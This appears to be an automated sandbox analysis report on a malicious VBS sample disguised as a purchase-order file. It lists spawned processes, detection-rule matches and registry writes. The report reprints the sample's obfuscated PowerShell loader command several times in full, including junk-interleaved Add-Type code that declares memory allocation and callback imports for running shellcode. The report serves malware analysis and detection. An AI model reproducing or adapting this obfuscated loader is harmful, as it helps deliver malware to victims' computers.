GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728Jump to behavior
Source: SIEM_PO00938467648.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_8.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03265E183_2_03265E18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03268F483_2_03268F48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: SIEM_PO00938467648.vbsInitial sample: Strings found which are bigger than 50
Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cruns3.fyd.ps1Jump to behavior
Source: classification engineClassification label: mal100.expl.evad.winVBS@11/9@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Pedagog\Defibrillationens\Elution", "cQGbcQGbuoYnrofrAswC6wKhHIHChsedPXEBm3EBm4HqEDNKxXEBm3EBm3EBm+sCgfTrTOsC", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Biliate = """LaABrdGedGa-StTDiyCopst", "", "", "0")
Obfuscated command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03261059 push eax; mov dword ptr [esp], edx3_2_0326106C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdlineJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
